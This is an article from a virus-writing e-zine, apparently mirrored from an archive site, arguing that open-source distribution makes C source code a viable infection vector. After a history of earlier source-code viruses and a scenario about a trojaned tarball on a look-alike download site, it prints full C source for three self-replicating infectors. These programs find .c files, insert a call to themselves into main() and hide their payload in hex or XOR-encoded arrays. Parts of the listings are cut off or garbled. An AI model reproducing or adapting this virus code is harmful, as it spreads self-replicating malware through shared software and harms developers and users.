www.pudn.com > 29a_fu.zip > 29A-7.017


 
Join us now and share the malware... 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
 
Reflections  about the  Open Source  and Free  Software community  and 
their blind believe in the goodness of the source code. 
 
by zert  
 
0.- Abstract 
1.- Introduction 
2.- Precedents 
    2.1.- DOS viruses, Urphin 
    2.2.- 1994, SrcVir virus family and Die-Hard virus 
    2.3.- Compiler libraries' infectors 
    2.4.- Any scripting language virus code 
3.- Why try to infect source code? 
4.- OK, but... how? 
    4.1.- Typical scenario 
    4.2.- ASM inline approach 
    4.3.- "Quine" approach 
    4.4.- Future developments 
5.- Conclusions 
6.- Related links 
 
 
0.- Abstract 
 
In this  article we'll  talk about  the possibilities  of infection of 
source code files, the precedents  that have been in this  subject and 
the future developments that could happen. 
 
The text will be enclosed with  examples in C, as "proofs of  concept" 
of the  explained details.  Besides, virus  development techniques for 
source  code  through  other  ways  will  be  presented,  from  a less 
practical  point  of  view  and   showing  the  main  steps  for   its 
programming. 
 
 
1.- Introduction 
 
As the Free Software Foundation  famous song [1] says, nowadays  a lot 
of people  are joining  the Free  Software movement  or other variants 
(more  commercial) as  the Open  Source movement.  The title  of this 
article wants to wink  at this song's chorus  ("Join us now and  share 
the software, you'll  be free, hackers,  you'll be free..."),  showing 
the  possibility of  this distribution  capacity which  has taken  the 
source code in these kind of  environments, could be used in order  to 
hand out again viral code. 
 
Many of  us are  starting to  develop an  almost blind  faith in those 
developers of  open source  programs because  the code  is visible, it 
will  be much  more difficult  to be  cheated and  the possibility  to 
insert not wanted effects into  these programs will be reduced.  If we 
think about it, when we go to  a magic show, many of the magic  tricks 
need a curtain, a wall or  something to hide how we are  being fooled, 
but  there are  many other  tricks that  are made  face in  our face, 
without using anything else but the hands and, even like this, we fall 
and we believe them. Something  similar could happen with open  source 
programs: the  code is  there and  everybody can  see and  examine it, 
however, only a very few do it (who has audited the *whole* code which 
is running through his box?).  And, besides, it would be  occasionally 
possible  to  obfuscate  the  code  to  make  highly  difficult  to be 
understood and to be able to insert hidden elements, not wanted by the 
user of that code. 
 
Source code viruses never have been a real threat, basically  because, 
until near today, to interchange programs distributing the source code 
was something very unusual outside a too geek environment. The viruses 
have  had  their  natural  habitat  within  the  executable  programs, 
typically binaries, that have been distributed hand by hand during all 
these  years.  Although P2P  networks  have returned  to  relaunch the 
massive interchange of binaries, it seems to be that this approach  is 
going progressively  down and  than what  rules right  now is to think 
about  an  approach  of  the  type  virus  +  worm,  using   different 
workstations or servers like infection vectors. 
 
Nowadays,  interchanging  programs  using  the  source  code  is   not 
something of computer freaks. In  the world of Free Software  and Open 
Source, this is  the most common  way to distribute  the code. Usually 
the code is audited at least  by the author of itself, although  there 
are a lot  of myths about  this. Anyway, some  cases have happened  in 
which the official FTP server has been cracked and the original source 
of  the  code  has  been  changed  [3]  [4].  In  those  occasions the 
introduced code was very obvious, but a more subtle attack could  have 
been tried. 
 
I  don't  know whether  in  a further  P2P  networks will  be  full of 
tarballs with the source code of a lot of programs or whether auditing 
the source code will be an automatizable task (where it would appear a 
new  battle  scene  between auditors  and  malware  writers), but  the 
verifiable fact is that in this very moment the interchange of  source 
code is increasing and, because of it, it is necessary to analyse  the 
convenience of its use as infection vector. 
 
 
2.- Precedents 
 
Up to now, a few and shy infectors have been developed with the target 
of infecting the source code. We are going to explain the reasons: the 
source code has not been  a goog infection method until  the irruption 
of the "open source revolution" on the curren scene. 
 
 
2.1. DOS viruses, Urphin 
 
In  the distant  pass age  of DOS  viruses, Urphin  virus [5]  already 
thought of infecting  source code as  a spread method.  This behaviour 
was  not strange  at all:  once came  out, it  remained resident  (31h 
service of int 21h), waiting for the execution of the program  TPC.EXE 
(Turbo Pascal Compiler) and it was at that moment when it  intercepted 
the  .PAS files  which contain  the source  code of  the programs  in 
Pascal. 
 
Once  found the  .PAS file,  it looked  for the  word "BEGIN",  which 
indicates the  beginning of  a code  block in  Pascal, an  it added  a 
hexadecimal dump of its  code together with the  code in Pascal to  be 
executed. When the  file was closed,  the virus eliminated  the source 
code just  inserted in  order to  make clean  the infected source code 
after having generated the executable binary. 
 
 
2.2.- 1994, SrcVir virus family and Die-Hard virus 
 
In many  web pages  in which  the history  of computer  [6] viruses is 
explained, SrcVirus family is mentioned. It appeared in 1994  together 
with a stream of new viruses with strange targets and behaviours up to 
that date. The aim  of this virus family  was mainly to infect  source 
code files written in  C and Pascal, in  similar way to the  mentioned 
Urphin. 
 
The same  year, it  was programmed  and released  another virus  which 
infected the source code, the Die-Hard virus [7]. This virus is  quite 
standard (COM  and EXE  infector in  DOS), except  for one feature: it 
looks  for  .ASM  and  .PAS files,  assembly  and  Pascal  source code 
respectively, in order to add a dump of its code. 
 
 
2.3.- Compiler libraries' infectors 
 
There are viruses which have the target of infecting OBJ and LIB files 
[8] in order to add its code to modules or libraries that will be used 
afterwards to be  linked with executable  code. The infected  files in 
this way would  act just as  "carriers", waiting for  am executable to 
link with these modules or libraries and to go on spreading the virus. 
In this  way, the  executable files  would not  infect the  executable 
files their self, so  that it wouldn't be  the risk of self  infection 
and it  should not  be observed  in the  virus code,  and the infected 
files  are  useless until  its  code is  included  into a  executable, 
remaining in a "latent" state until that happens. 
 
 
2.4.- Any scripting language virus code   
 
Obviously, any viruses  which is written  in a scripting  language and 
which has the target of  infecting other scripts, will be  an infector 
which copies  its source  code in  the guest  file. There  are several 
approaches to this kind of virus in Perl or Shell Scripts [9] [10] and 
countless  Internet worms  written in  Visual Basic  Script and  other 
kinds of scripting languages. 
 
 
3.- Why try to infect source code? 
 
As we have  mentioned before, it's  possible to be  an expanding field 
and several factors prove it: 
 
* The  increasing interest  about Operating  Systems as  GNU/Linux and 
*BSD generates an users community whose main value is the source  code 
and this one is user as change  coin. Some of these new users are  far 
away from the  original idea of  a UNIX hacker,  and they become  less 
technical (using the computer as a quite modern washing machine). 
 
* The  growing interest  of Governments  and Public  entities in using 
open source software in order to increase its security. Open source is 
not  itself (inherently)  more secure  than close  source software  if 
appropriate measures  are not  taken. There  are a  lot of myths about 
this [2], apart from many attempts from Microsoft in order to  deceive 
the consumer with half the truth [13]. 
 
* Some  program demand  to be  compiled in  each computer  separately, 
either because it is free software that links with property  libraries 
or codecs,  or because  it can  be an  enormous difference between the 
generic  version  for  i386  and this  one  compiled  in  the specific 
computer.  This  fact  demands  a  development  environment  in   more 
computers.  The  paradigmatic  example of  this  case  is the  Mplayer 
multimedia player. 
 
 
4.- OK, but... how? 
 
4.1.- Typical scenario 
 
Bob is a young sysadmin fascinated by wireless networks. His knowledge 
about  computer  networks  are  advanced, but  he  has  no  idea about 
programming further a few simple shell scripts. 
 
At a very  enjoyable wardriving evening,  when he and  his friend Dave 
are listening to  Massive Attack and  pursue among routers  of a local 
company, Bob is astonished of the great program that Dave has to  scan 
wireless networks. Eager, he asks  him the URL to download  it without 
further delay: 
 
wget http://packetstormsecurify.nl/sniffers/wireless/wlanthrax-0.6.9.tar.gz 
tar xzf wlanthrax-0.6.9.tar.gz 
cd wlanthrax-0.6.9 
./configure 
make 
make install 
 
(advisory: http://packetstormsecurify.nl doesn't exist but it could be 
bought in a reasonable price. Any resemblance with the coincidence, is 
real truth) 
 
Yeah! The program is working and the networks are surrending as scared 
rats, tons of adrenaline! like in the old times! What poor Bob doesn't 
know is that this tarball contained malware and now he has it  running 
through the digital veins of his laptop. 
 
The same thing had happened to Bob before, and from that time he never 
do this as root user. Obviously, "make install" command wouldn't  ever 
work as a normal user, but  the tool would go on being  executable and 
usable. Clever boy, but even from a normal user account, we could  try 
to  infect  the  whole  source  code  that  we  can  reach  with those 
privileges, which can be enough. 
 
Do you think this situation is improbable? How many times have we done 
tar xzf && ./configure && make  && make install blindly? I admit  that 
sometimes I've installed software in that way O;-D 
 
 
4.2.- ASM inline approach 
 
Every virus coder knows reverse engineering tools which provide a high 
quality  disassemblies.  Quickly  come   to  my  mind  names   as  IDA 
disassembler or even the disassembly view mode of HIEW (Hackers View). 
The port for UNIX of HIEW, BIEW (which is really his "small  brother") 
also supports the  disassembly view and  we can see  easily the source 
code in assembler of any program. 
 
An ASM inline approach to infect source files should implement a small 
disassembler of its own code, to  be able to include it in  the source 
code file. If we take as a reference the source code written in C used 
in GNU/Linux, we should create  a disassembler for our code  with AT&T 
syntax, and include this code in a function: 
 
int virus() 
{ 
  __asm__( 
  	"pusha\n\t" 
	"call 0x8048086\n\t" 
	[...] 
	"mov $0x1,%%eax\n\t" 
	"int $0x80" 
  ); 
} 
 
To obtain that disassembly we can use the Free Software philosophy and 
get the code that  does that work in  BIEW or objdump tools.  The main 
problem of doing in that way is that the disassembler would take up  a 
very important part of our virus code, so we can discard this and  try 
to call that tools directly: if our aim is to infect the source  code, 
we can suppose that the infected computer is a development workstation 
which can have  those tools installed.  Using the syscall  "execve" in 
UNIX we could execute one of those tools and generate the printout  in 
a son process. An optimised version of this point of view would  check 
whether there are some of the most common tools which could make  this 
job. 
 
Pros: 
 
* We don't need to think  too much, there is everything done,  we have 
to join the pieces ;-) 
 
* We are still programming in assembler, controlling each detail.  
 
Contras: 
 
* It is not "discreet" indeed.  
 
* Being assembler, we lose the inherent multiplatform feature of  most 
of the source code.  
 
* The disassembly process can sometimes be too troublesome. 
 
 
4.3.- "Quine" approach 
 
A "quine" is  a program that  generates its own  source code *without* 
reading  its own  code. It  have been  done international  programming 
championships of  these peculiar  proggies, all  of them  in a extreme 
-freak atmosphere. 
 
There are several  ways to do  quines, some very  complicated and very 
elegant others, but the most functional form, in my humble opinion, is 
using arrays of chars. In fact, I remained very surprised after  doing 
my first quine, because when I saw the rest were many very  different, 
but the one that made Ken Thompson was practically identical, although 
a little less complicated: the main idea is to have the source code in 
an array of chars to be able to do the following thing: 
 
printf("char array[] = \"%s\";" array); 
 
With that  approach we  break the  vicious circle  that propose quines 
when    you   want    to   print    out   your    own   code    (doing 
printf("printf(\"printf(\"... does not seem to be a good approach;-D). 
 
A time later I discovered an authentic jewel of computer science  [11] 
when  I saw  the problem  that proposed  Thompson in  its famous  talk 
"Reflections on Trusting Trust" when he won the ACM Award. Is  amazing 
to understand the implications of that text, and is surprising to  see 
an authentic guru like Ken Thompson speaking like a malware coder };-) 
At the moment, the issue explained does not have a very clear solution 
and seems to be a headache without a simple solution [12]. 
 
Well, if we focus in this main  point, we can see how is necessary  an 
array of chars that contains the code of the program. It is here where 
the greater differences can arise.  Thompson created its array one  by 
one separating chars of the following form: 
 
char s[] = { 
        '\t', 
        '0', 
        '\n', 
        '}', 
        ';', 
        '\n', 
        '\n', 
        'm', 
        'a', 
        'i', 
        'n', 
        '(', 
        ')', 
        '\n', 
 
        ... 
 
        0 }; 
         
In my  initial approach  I saw  that this,  in adition  of being quite 
strange, was too obvious, that  is, is shown clearly that  the content 
of that array  is source code  written in C.  Because of that,  I used 
another annotation to keep each char in a non so obvious way: 
 
char s[] = { 
0x6D, 0x61, 0x69, 0x6E, 0x28, 0x29, 0x20, 0x7B, 
0x0D, 0x0A, 0x69, 0x6E, 0x74, 0x20, 0x69, 0x3B, 
0x0D, 0x0A, 0x09, 0x70, 0x72, 0x69, 0x6E, 0x74, 
0x66, 0x28, 0x22, 0x63, 0x68, 0x61, 0x72, 0x20, 
 
... 
 
0 }; 
 
The immediate goal was fulfilled: that does not seem C source code  to 
eyes of somebody little  familiarized with ASCII table.  Nevertheless, 
this way to define the array increased too much the size of the  code, 
it was necessary to think a way to reduce it. First which I thought to 
do that  was to  duplicate the  space in  the executable  code, but to 
reduce to half the space in the source code, creating an array as this 
one: 
 
char s[] = "6D61696E2829207B0D0A69..."; 
 
Doing it this way I am using much less space in C source code. The bad 
news are that now  I use 2 bytes  to represent each to  char within my 
array (damn!!). We cannot use printf() to print that array in the host 
code, we must do something similar to this: 
 
int i; 
char nibblechar, nibble[2]; 
 
for(i=0;i 
<-opensauce.c---------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * OpenSauce 
 * 
 * A trial to infect source code 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
#include  
 
void virus(); 
 
int main(int argc, char *argv[]) { 
  virus(); 
} 
 
void virus() { 
  int i, hd, fd, readbyte, writebyte, posmain, posbuffer; 
  DIR *dd; 
  struct dirent *dirp; 
  char nibble[2], nibblechar, *readbuffer, *writebuffer, 
       *readmain, *writemain, *bufname, *buffer; 
  char charinclude[] = "23696e636c756465203c737464696f2e683e0a23696e636c756465203c7374646c69622e683e0a23696e636c756465203c7379732f737461742e683e0a23696e636c756465203c756e697374642e683e0a23696e636c756465203c66636e746c2e683e0a23696e636c756465203c74696d652e683e0a23696e636c756465203c646972656e742e683e0a23696e636c756465203c656c662e683e0a23696e636c756465203c7379732f74797065732e683e0a23696e636c756465203c7379732f776169742e683e0a0a766f696420766972757328293b0a0a"; 
  char charvirus[] = "0a766f69642076697275732829207b0a2020696e7420692c2068642c2066642c2072656164627974652c207772697465627974652c20706f736d61696e2c20706f736275666665723b0a2020444952202a64643b0a202073747275637420646972656e74202a646972703b0a202063686172206e6962626c655b325d2c206e6962626c65636861722c202a726561646275666665722c202a77726974656275666665722c200a202020202020202a726561646d61696e2c202a77726974656d61696e2c202a6275666e616d652c202a6275666665723b0a"; 
  char charvirusend[] = "0a20206464203d206f70656e64697228222e22293b0a20207768696c65282864697270203d207265616464697228646429293e3029200a202020206966282868643d6f70656e28646972702d3e645f6e616d652c204f5f524457522c203029293e3d3029207b0a ... "; 
 
  /* scan for hosts in current dir */ 
  dd = opendir("."); 
  while((dirp = readdir(dd))>0) 
      if((fd=open(dirp->d_name, O_RDWR, 0))>=0) { 
        /* is a C source file? */ 
        if(!(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".c"))|| 
           !(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".C"))) { 
          /* searching infection mark... */ 
          lseek(fd, -30, SEEK_END); 
          bufname = (char *)malloc(30); 
          readbyte = read(fd, bufname,30); 
          if((strstr(bufname, "/* sauce! */")<=0)) { 
            /* infection mark not found */ 
            /* searching main() function... */ 
            lseek(fd, 0, SEEK_SET); 
            posmain = posbuffer = 0; 
            buffer = (char *)malloc(1024); 
            while((readbyte=read(fd,buffer,1024))>0) { 
              if( ((posbuffer=(int)strstr(buffer,"\nmain("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nint main("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nvoid main("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nmain ("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nint main ("))>0) || 
                ((posbuffer=(int)strstr(buffer,"\nvoid main ("))>0) ) { 
                break; 
              } 
              posmain += readbyte; 
            } 
            if(posbuffer>0) { 
              posmain += ((int)posbuffer-(int)buffer); 
              lseek(fd, posmain, SEEK_SET); 
              read(fd, buffer, 80); 
              if((posbuffer = (int)strstr(buffer,"{\n"))>0) 
                posmain += 2 + ((int)posbuffer-(int)buffer); 
              else 
                posmain = -1; 
            } else posmain = -1; 
            if(posmain>0) { 
              /* let's infect! */ 
              lseek(fd, 0, SEEK_SET); 
              writebyte = strlen(charinclude) / 2; 
              readbuffer = (char *)malloc(writebyte); 
              writebuffer = (char *)malloc(writebyte); 
              writebuffer = (char *)malloc(writebyte); 
              for(i=0;i0) { 
                lseek(fd, -readbyte, SEEK_CUR); 
                write(fd, writebuffer, writebyte); 
                writebyte = read(fd, writebuffer, writebyte); 
                lseek(fd, -writebyte, SEEK_CUR); 
                write(fd, readbuffer, readbyte); 
              } 
              lseek(fd,-readbyte,SEEK_CUR); 
              write(fd,writebuffer,writebyte); 
              /* call virus from main() */ 
              writebyte = strlen(charinclude) / 2; 
              lseek(fd, posmain+writebyte, SEEK_SET); 
              writebyte = strlen("\n  virus();\n"); 
              readmain = (char *)malloc(writebyte); 
              writemain = (char *)malloc(writebyte); 
              strcpy(writemain,"\n  virus();\n"); 
              while((readbyte=read(fd,readmain,writebyte))>0) { 
                lseek(fd,-readbyte,SEEK_CUR); 
                write(fd,writemain,writebyte); 
                writebyte=read(fd,writemain,writebyte); 
                lseek(fd,-writebyte,SEEK_CUR); 
                write(fd,readmain,readbyte); 
              } 
              lseek(fd,-readbyte,SEEK_CUR); 
              write(fd,writemain,writebyte); 
              /* copy virus function at EOF */ 
              lseek(fd, 0, SEEK_END); 
              for(i=0;i 
<-end of opensauce.c--------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
The code is not a jewel of the programming science, but it's useful to 
show what  it wanted  and in  addition works  (more or  less). In  the 
"charvirusend" array  many lines  have been  suppressed not  to fatten 
unnecessarily this text (if you want a functional version of the code, 
look for it in 29a #7 e-zine). The rest of code is quite trivial: 
 
1) Search  files in  the current  directory: open  the directory  with 
opendir(), read each  one of its  entries with readdir()  and close it 
with closedir().  
 
2) Once we have a possible victim, we verify thus if is a ".c" or ".C" 
file, and if it has been already infected (if contains "/* sauce *  /" 
infection mark) and if it is a C source file with a main() function. 
 
3) If all the specified in  the previous point has been fulfilled,  we 
come  to  infect, copying  the  includes and  the  declaration of  the 
virus() function in the beginning (charinclude), adding a call to this 
function within  main(), and  generating at  the end  of the  code the 
virus()  function  virus() (using  "charvirus"  and "charvirusend"  in 
addition to a few calls to write() to define arrays).  
 
4) Once finished the infection,  we close the file and  the directory, 
because we just infect one file each time.  
 
5)  virus() function  ends and  we return  to the  original code,  and 
everything works as it would have to work.  
 
Let's  see  another example  of  this type  of  virus, something  more 
evolved: 
 
<---------------------------------------------------------------------------> 
<-hash.c--------------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * Hash, 
 * 
 * quine-based source code infector. 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
 
void init_hash();  
 
int main(int argc, char *argv[]) 
{ 
	init_hash(); 
} 
 
void init_hash() 
{ 
	int i, j, fd, size, mpos, ipos, page,  
	ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; 
	void *ptr; 
	char hashinc[] = "\n#include \n#include \n#include \n#include \n#include \n#include \n\nvoid init_hash();\n"; 
	char hashbeg[] = "\nvoid init_hash()\n{\n\tint i, j, fd, size, mpos, ipos, page, \n\tihole, thole, bhole, ehole; struct dirent *dir; DIR *d;\n\tvoid *ptr;\n\tchar hashinc[] = \""; 
	char hashend[] = "\tchar *buf;\n\n\td = opendir(\".\");\n\twhile((dir = readdir(d))>0)\n\t\tif(!(strcmp(dir->d_name+strlen(dir->d_name)-2,\".c\"))||\n\t\t   !(strcmp(dir->d_name+strlen(dir->d_name)-2,\".C\"))) \n\t\t\tif((fd=open(dir->d_name, O_RDWR, 0))>=0)\n\t\t\t{\n\t\t\t\tsize = lseek(fd, 0, SEEK_END);\n\t\t\t\tptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);\n\t\t\t\tif( (!strstr(ptr,\"init_hash\")) &&\n\t\t\t\t  ( ((mpos=(int)strstr(ptr,\"\\nmain(\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nint main(\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nvoid main(\"))>0) || \n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nmain (\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nint main (\"))>0) ||\n\t\t\t\t    ((mpos=(int)strstr(ptr,\"\\nvoid main (\"))>0) ) )\n\t\t\t\t{\n\t\t\t\t\tmpos = (int)strstr((void *)mpos, \";\\n\");\n\t\t\t\t\tmpos -= (int)--ptr;\n\t\t\t\t\tif( !(ipos = (int)strstr(++ptr, \"#include <\")) )\n\t\t\t\t\t{\n\t\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\tpage = 3 * (int)sysconf(_SC_PAGESIZE);\n\t\t\t\t\tftruncate(fd, size+page);\n\t\t\t\t\tptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);\n\t\t\t\t\tipos = (int)strstr(ptr, \"#include <\");\n\t\t\t\t\tipos = (int)strstr((void *)ipos, \"\\n\\n\");\n\t\t\t\t\tipos -= (int)ptr;\n\t\t\t\t\tihole = strlen(hashinc);\n\t\t\t\t\tfor(i=(size-ipos)/ihole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);\n\t\t\t\t\tmemcpy(ptr+ipos, hashinc, ihole);\n\t\t\t\t\tmpos += ihole;\n\t\t\t\t\tbuf = (char *)malloc(20*sizeof(char));\n\t\t\t\t\tstrcpy(buf,\"\\n\\tinit_hash();\");\n\t\t\t\t\tthole = strlen(buf);\n\t\t\t\t\tfor(i=(size+ihole-mpos)/thole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);\n\t\t\t\t\tmemcpy(ptr+mpos, buf, thole);\n\t\t\t\t\tbhole = strlen(hashbeg);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole, hashbeg, bhole);\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashinc));\n\t\t\t\t\tfor(i=0,j=0;i0) 
		if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| 
		   !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C")))  
			if((fd=open(dir->d_name, O_RDWR, 0))>=0) 
			{ 
				size = lseek(fd, 0, SEEK_END); 
				ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); 
				if( (!strstr(ptr,"init_hash")) && 
				  ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main("))>0) ||  
				    ((mpos=(int)strstr(ptr,"\nmain ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) 
				{ 
					mpos = (int)strstr((void *)mpos, ";\n"); 
					mpos -= (int)--ptr; 
					if( !(ipos = (int)strstr(++ptr, "#include <")) ) 
					{ 
						munmap(ptr, size); 
						break; 
					} 
					munmap(ptr, size); 
					page = 3 * (int)sysconf(_SC_PAGESIZE); 
					ftruncate(fd, size+page); 
					ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); 
					ipos = (int)strstr(ptr, "#include <"); 
					ipos = (int)strstr((void *)ipos, "\n\n"); 
					ipos -= (int)ptr; 
					ihole = strlen(hashinc); 
					for(i=(size-ipos)/ihole;i>=0;i--)  
						memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); 
					memcpy(ptr+ipos, hashinc, ihole); 
					mpos += ihole; 
					buf = (char *)malloc(20*sizeof(char)); 
					strcpy(buf,"\n\tinit_hash();"); 
					thole = strlen(buf); 
					for(i=(size+ihole-mpos)/thole;i>=0;i--)  
						memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); 
					memcpy(ptr+mpos, buf, thole); 
					bhole = strlen(hashbeg); 
					memcpy(ptr+size+ihole+thole, hashbeg, bhole); 
					 
					/* declaracion de arrays y arrays */ 
					buf = (char *)malloc(100*sizeof(char)+strlen(hashinc)); 
					for(i=0,j=0;i 
<-end of hash.c-------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
In this example, hashes are in plain text and correspond to  necessary 
format strings to generate each code lines for the infection. In spite 
of their size,  hashes will occupy  less enough within  the executable 
program, because all the escape characters will be reduced to one byte 
each. As a counterpart, we  will have to introduce the  necessary code 
to regenerate  both chars  that specify  each escape  character solely 
(translating just '\t', '\n', '\\' and '\"'). 
 
All the remaining code are byte copies within the memory address where 
the file resides,  by using memcpy().  The use of  mmap() and memcpy() 
instead of open(), write() and  lseek() speeds up the modification  of 
files enormously.  
 
Finally, the "Peio" infector uses the same techniques that "Hash", but 
in this case hashes are XORed, reason why escape characters like  '\t' 
or '\n' can be used  without having to indicate it  specifically. This 
way, the size of the  hash array is reduced considerably,  in addition 
to  not needing  the code  that translates  to two  bytes each  escape 
character. 
 
<---------------------------------------------------------------------------> 
<-peio.c--------------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
/* 
 * Peio, 
 *     
 * source code infector XORing hashes. 
 *                   zert  
 * 
 */ 
 
#include  
#include  
#include  
#include  
#include  
#include  
 
void init_hash();  
 
int main(int argc, char *argv[]) 
{ 
	init_hash(); 
} 
 
void init_hash() 
{ 
	int i, j, fd, size, mpos, ipos, page,  
	ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; 
	void *ptr; 
	char hashinc[] = "Š£éîãìõäå 1/4óôäéï(r)è3/4Š£éîãìõäå 1/4óùó¯óôáô(r)è3/4Š£éîãìõäå 1/4óùó¯ííáî(r)è3/4Š£éîãìõäå 1/4õîéóôä(r)è3/4Š£éîãìõäå 1/4äéòåîô(r)è3/4Š£éîãìõäå 1/4æãîôì(r)è3/4ŠŠöïéä éîéôßèáóè¨(c)" Š"; 
	char hashbeg[] = "Šöïéä éîéôßèáóè¨(c)ŠûЉéîô é¬ ê¬ æä¬ óéúå¬ íðïó¬ éðïó¬ ðáçå¬ Š‰éèïìå¬ ôèïìå¬ âèïìå¬ åèïìå" óôòõãô äéòåîô ªäéò" ÄÉÒ ªä"Љöïéä ªðôò"Љãèáò èáóèéîãÛÝ 1/2 ¢"; 
	char hashend[] = "‰ãèáò ªâõæ"ŠŠ‰ä 1/2 ïðåîäéò¨¢(r)¢(c)"Љ÷èéì娨äéò 1/2 òåáääéò¨ä(c)(c)3/4°(c)Љ‰é模¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)ã¢(c)(c)üüЉ‰   ¡¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)â(c)(c)(c) Љ‰‰é樨æä1/2ïðåî¨äéò­3/4äßîáíå¬ ÏßÒÄ×Ò¬ °(c)(c)3/41/2°(c)Љ‰‰ûЉ‰‰‰óéúå 1/2 ìóååë¨æä¬ °¬ ÓÅÅËßÅÎÄ(c)"Љ‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå¬ÐÒÏÔßÒÅÁĬÍÁÐßÐÒÉÖÁÔŬæä¬°(c)"Љ‰‰‰éæ¨ ¨¡óôòóôò¨ðôò¬¢éîéôßèáóè¢(c)(c) ¦¦Š‰‰‰‰  ¨ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáé(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáé(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáé(c)(c)3/4°(c) üü Љ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáéî ¨¢(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáéî ¨¢(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáéî ¨¢(c)(c)3/4°(c) (c) (c)Љ‰‰‰ûЉ‰‰‰‰íðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)íðïó¬ ¢"Üî¢(c)"Љ‰‰‰‰íðïó ­1/2 ¨éîô(c)­­ðôò"Љ‰‰‰‰éæ¨ ¡¨éðïó 1/2 ¨éîô(c)óôòóôò¨""ðôò¬ ¢£éîãìõäå 1/4¢(c)(c) (c)Љ‰‰‰‰ûЉ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰‰‰âòåáë"Љ‰‰‰‰ýЉ‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰‰ðáçå 1/2 ³ ª ¨éîô(c)óùóãïîæ¨ßÓÃßÐÁÇÅÓÉÚÅ(c)"Љ‰‰‰‰æôòõîãáôå¨æä¬ óéúå"ðáçå(c)"Љ‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå"ðáçå¬ÐÒÏÔßÒÅÁÄ"ÐÒÏÔß×ÒÉÔŬÍÁÐßÓÈÁÒÅĬæä¬°(c)"Љ‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨ðôò¬ ¢£éîãìõäå 1/4¢(c)"Љ‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)éðïó¬ ¢ÜîÜî¢(c)"Љ‰‰‰‰éðïó ­1/2 ¨éîô(c)ðôò"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Љ‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Љ‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰éèïìå 1/2 óôòìåî¨èáóèéîã(c)"Љ‰‰‰‰æïò¨é1/2¨óéúå­éðïó(c)¯éèïìå"é3/41/2°"é­­(c) Љ‰‰‰‰‰íåíãðù¨ðôò"éðïó"éªéèïìå"éèïìå¬ ðôò"éðïó"éªéèïìå¬ éèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"éðïó¬ 